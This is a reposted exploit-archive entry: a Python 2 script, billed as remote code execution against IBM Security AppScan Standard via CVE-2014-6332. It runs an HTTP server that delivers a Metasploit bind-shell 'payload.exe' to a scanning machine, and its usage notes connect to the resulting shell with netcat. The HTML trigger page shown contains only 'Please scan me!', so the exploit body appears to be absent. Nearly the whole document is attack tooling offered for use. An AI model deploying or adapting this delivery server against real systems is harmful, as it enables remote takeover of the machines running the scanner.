
    IBM Security AppScan Standard OLE Automation Array Remote Code Execution

    Posted by 没穿底裤 on 2015-06-14 18:54:59

    #!/usr/bin/python
    
    import BaseHTTPServer, socket
    
    ##
    # IBM Security AppScan Standard OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 1 June 2015
    # Version: <= 9.0.2
    # Tested on: Windows 7
    #
    # Exploit based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
    # If you are able to exploit IE then you can exploit AppScan and Acunetix ;)
    # This Python script starts a sample HTTP server on the attacker machine and serves the exploit code and
    # a Metasploit windows/shell_bind_tcp executable payload.
    #
    # Usage:
    #       chmod +x appscan.py
    #       ./appscan.py
    #       ...
    #       nc 172.20.10.14 333
    #
    # Video: http://youtu.be/hPs1zQaBLMU
    ##
    
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        # Python 2 request handler; 'req' is the handler instance (conventionally named self)
        def do_GET(req):
            req.send_response(200)
            if req.path == "/payload.exe":
                # serve the pre-built payload binary from the current working directory
                req.send_header('Content-type', 'application/exe')
                req.end_headers()
                exe = open("payload.exe", 'rb')
                req.wfile.write(exe.read())
                exe.close()
            else:
                # every other path returns the HTML page that the scanner will fetch and render
                req.send_header('Content-type', 'text/html')
                req.end_headers()
                req.wfile.write("""Please scan me!
                                """)
    
    if __name__ == '__main__':
        sclass = BaseHTTPServer.HTTPServer
        # bind to the host's primary IP address on port 80 (binding port 80 needs root on Linux)
        server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
        print "Http server started", socket.gethostbyname(socket.gethostname()), 80
        try:
            server.serve_forever()
        except KeyboardInterrupt:
            pass
        server.server_close()
